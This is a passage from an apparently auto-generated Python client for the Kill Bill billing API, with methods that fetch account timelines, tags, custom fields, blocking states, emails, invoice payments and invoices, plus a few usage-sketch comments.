:param async bool
:param Str account_id: (required)
:param Bool parallel:
:param Str audit:
:return: AccountTimeline
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'parallel', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_timeline" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_account_timeline`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_account_timeline`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'parallel' in params:
query_params.append(('parallel', params['parallel'])) # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/timeline', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountTimeline', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_accounts(self, **kwargs): # noqa: E501
"""List accounts # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_accounts(async=True)
>>> result = thread.get()
:param async bool
:param Int offset:
:param Int limit:
:param Bool account_with_balance:
:param Bool account_with_balance_and_cba:
:param Str audit:
:return: List[Account]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_accounts_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_accounts_with_http_info(**kwargs) # noqa: E501
return data
def get_accounts_with_http_info(self, **kwargs): # noqa: E501
"""List accounts # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_accounts_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param Int offset:
:param Int limit:
:param Bool account_with_balance:
:param Bool account_with_balance_and_cba:
:param Str audit:
:return: List[Account]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['offset', 'limit', 'account_with_balance', 'account_with_balance_and_cba', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_accounts" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'account_with_balance' in params:
query_params.append(('accountWithBalance', params['account_with_balance'])) # noqa: E501
if 'account_with_balance_and_cba' in params:
query_params.append(('accountWithBalanceAndCBA', params['account_with_balance_and_cba'])) # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/pagination', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[Account]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
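# Pagination sketch for get_accounts (assumes `api` is an instance of this
# class; stopping on an empty page is an assumption about server behaviour):
# offset and limit map directly onto the query string of
# /1.0/kb/accounts/pagination.
#
#   offset = 0
#   page_size = 100
#   while True:
#       page = api.get_accounts(offset=offset, limit=page_size)
#       if not page:
#           break
#       offset += len(page)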
def get_all_custom_fields(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account customFields # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_all_custom_fields(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str object_type:
:param Str audit:
:return: List[CustomField]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_all_custom_fields_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_all_custom_fields_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_all_custom_fields_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account customFields # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_all_custom_fields_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str object_type:
:param Str audit:
:return: List[CustomField]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'object_type', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_custom_fields" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_all_custom_fields`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_all_custom_fields`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'object_type' in params:
query_params.append(('objectType', params['object_type'])) # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/allCustomFields', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[CustomField]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_tags(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account tags # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_all_tags(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str object_type:
:param Bool included_deleted:
:param Str audit:
:return: List[Tag]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_all_tags_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_all_tags_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_all_tags_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account tags # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_all_tags_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str object_type:
:param Bool included_deleted:
:param Str audit:
:return: List[Tag]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'object_type', 'included_deleted', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_tags" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_all_tags`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_all_tags`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'object_type' in params:
query_params.append(('objectType', params['object_type'])) # noqa: E501
if 'included_deleted' in params:
query_params.append(('includedDeleted', params['included_deleted'])) # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/allTags', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[Tag]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
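# get_all_tags differs from get_account_tags in that it can return tags attached
# to any object type belonging to the account; object_type narrows the result to
# a single type. Usage sketch (placeholder UUID; the object type string is an
# assumption):
#
#   tags = api.get_all_tags(
#       account_id='268983f2-5443-47e4-a967-b8962fc699c5',
#       object_type='ACCOUNT')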
def get_blocking_state_audit_logs_with_history(self, blocking_id=None, **kwargs): # noqa: E501
"""Retrieve blocking state audit logs with history by id # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_blocking_state_audit_logs_with_history(blocking_id, async=True)
>>> result = thread.get()
:param async bool
:param Str blocking_id: (required)
:return: List[AuditLog]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_blocking_state_audit_logs_with_history_with_http_info(blocking_id, **kwargs) # noqa: E501
else:
(data) = self.get_blocking_state_audit_logs_with_history_with_http_info(blocking_id, **kwargs) # noqa: E501
return data
def get_blocking_state_audit_logs_with_history_with_http_info(self, blocking_id=None, **kwargs): # noqa: E501
"""Retrieve blocking state audit logs with history by id # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_blocking_state_audit_logs_with_history_with_http_info(blocking_id, async=True)
>>> result = thread.get()
:param async bool
:param Str blocking_id: (required)
:return: List[AuditLog]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['blocking_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_blocking_state_audit_logs_with_history" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'blocking_id' is set
if ('blocking_id' not in params or
params['blocking_id'] is None):
raise ValueError("Missing the required parameter `blocking_id` when calling `get_blocking_state_audit_logs_with_history`") # noqa: E501
if 'blocking_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['blocking_id']): # noqa: E501
raise ValueError("Invalid value for parameter `blocking_id` when calling `get_blocking_state_audit_logs_with_history`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'blocking_id' in params:
path_params['blockingId'] = params['blocking_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/block/{blockingId}/auditLogsWithHistory', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[AuditLog]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_blocking_states(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve blocking states for account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_blocking_states(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param List[Str] blocking_state_types:
:param List[Str] blocking_state_svcs:
:param Str audit:
:return: List[BlockingState]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_blocking_states_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_blocking_states_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_blocking_states_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve blocking states for account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_blocking_states_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param List[Str] blocking_state_types:
:param List[Str] blocking_state_svcs:
:param Str audit:
:return: List[BlockingState]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'blocking_state_types', 'blocking_state_svcs', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_blocking_states" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_blocking_states`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_blocking_states`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'blocking_state_types' in params:
query_params.append(('blockingStateTypes', params['blocking_state_types'])) # noqa: E501
collection_formats['blockingStateTypes'] = 'multi' # noqa: E501
if 'blocking_state_svcs' in params:
query_params.append(('blockingStateSvcs', params['blocking_state_svcs'])) # noqa: E501
collection_formats['blockingStateSvcs'] = 'multi' # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/block', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[BlockingState]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
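# blocking_state_types and blocking_state_svcs are list parameters with the
# 'multi' collection format, so every element becomes its own repeated query
# parameter. Usage sketch (the type and service strings are assumptions):
#
#   states = api.get_blocking_states(
#       account_id='268983f2-5443-47e4-a967-b8962fc699c5',
#       blocking_state_types=['SUBSCRIPTION_BUNDLE'],
#       blocking_state_svcs=['entitlement-service'])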
def get_children_accounts(self, account_id=None, **kwargs): # noqa: E501
"""List children accounts # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_children_accounts(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Bool account_with_balance:
:param Bool account_with_balance_and_cba:
:param Str audit:
:return: List[Account]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_children_accounts_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_children_accounts_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_children_accounts_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""List children accounts # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_children_accounts_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Bool account_with_balance:
:param Bool account_with_balance_and_cba:
:param Str audit:
:return: List[Account]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'account_with_balance', 'account_with_balance_and_cba', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_children_accounts" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_children_accounts`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_children_accounts`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'account_with_balance' in params:
query_params.append(('accountWithBalance', params['account_with_balance'])) # noqa: E501
if 'account_with_balance_and_cba' in params:
query_params.append(('accountWithBalanceAndCBA', params['account_with_balance_and_cba'])) # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/children', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[Account]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
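
    # Minimal usage sketch for get_children_accounts, assuming an already-configured
    # AccountApi instance named `account_api` and the UUID of a parent account in
    # `parent_account_id`:
    #
    #     children = account_api.get_children_accounts(
    #         parent_account_id, account_with_balance=True)
    #     print(len(children))  # a list of Account models, one per child account
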
def get_emails(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve an account emails # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_emails(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:return: List[AccountEmail]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_emails_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_emails_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_emails_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve an account emails # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_emails_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:return: List[AccountEmail]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_emails" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_emails`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_emails`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/emails', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[AccountEmail]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
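
    # Minimal usage sketch for get_emails, assuming `account_api` is a configured
    # AccountApi instance and `account_id` a valid account UUID:
    #
    #     emails = account_api.get_emails(account_id)
    #     for entry in emails:
    #         print(entry)  # each entry is an AccountEmail model
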
def get_invoice_payments(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account invoice payments # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_invoice_payments(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Bool with_plugin_info:
:param Bool with_attempts:
:param List[Str] plugin_property:
:param Str audit:
:return: List[InvoicePayment]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_invoice_payments_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_invoice_payments_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_invoice_payments_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account invoice payments # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_invoice_payments_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Bool with_plugin_info:
:param Bool with_attempts:
:param List[Str] plugin_property:
:param Str audit:
:return: List[InvoicePayment]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'with_plugin_info', 'with_attempts', 'plugin_property', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_invoice_payments" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_invoice_payments`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_invoice_payments`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'with_plugin_info' in params:
query_params.append(('withPluginInfo', params['with_plugin_info'])) # noqa: E501
if 'with_attempts' in params:
query_params.append(('withAttempts', params['with_attempts'])) # noqa: E501
if 'plugin_property' in params:
query_params.append(('pluginProperty', params['plugin_property'])) # noqa: E501
collection_formats['pluginProperty'] = 'multi' # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/invoicePayments', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[InvoicePayment]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
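
    # Minimal usage sketch for get_invoice_payments, assuming a configured
    # `account_api` and a valid `account_id`:
    #
    #     invoice_payments = account_api.get_invoice_payments(
    #         account_id, with_attempts=True)
    #     # returns a list of InvoicePayment models, including payment attempts
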
def get_invoices_for_account(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account invoices # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_invoices_for_account(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Date start_date:
:param Date end_date:
:param Bool with_migration_invoices:
:param Bool unpaid_invoices_only:
:param Bool include_voided_invoices:
:param Str invoices_filter:
:param Str audit:
:return: List[Invoice]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_invoices_for_account_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_invoices_for_account_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_invoices_for_account_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account invoices # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_invoices_for_account_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Date start_date:
:param Date end_date:
:param Bool with_migration_invoices:
:param Bool unpaid_invoices_only:
:param Bool include_voided_invoices:
:param Str invoices_filter:
:param Str audit:
:return: List[Invoice]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'start_date', 'end_date', 'with_migration_invoices', 'unpaid_invoices_only', 'include_voided_invoices', 'invoices_filter', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_invoices_for_account" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_invoices_for_account`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_invoices_for_account`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'start_date' in params:
query_params.append(('startDate', params['start_date'])) # noqa: E501
if 'end_date' in params:
query_params.append(('endDate', params['end_date'])) # noqa: E501
if 'with_migration_invoices' in params:
query_params.append(('withMigrationInvoices', params['with_migration_invoices'])) # noqa: E501
if 'unpaid_invoices_only' in params:
query_params.append(('unpaidInvoicesOnly', params['unpaid_invoices_only'])) # noqa: E501
if 'include_voided_invoices' in params:
query_params.append(('includeVoidedInvoices', params['include_voided_invoices'])) # noqa: E501
if 'invoices_filter' in params:
query_params.append(('invoicesFilter', params['invoices_filter'])) # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/invoices', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[Invoice]', # noqa: E501
auth_settings=auth_settings,
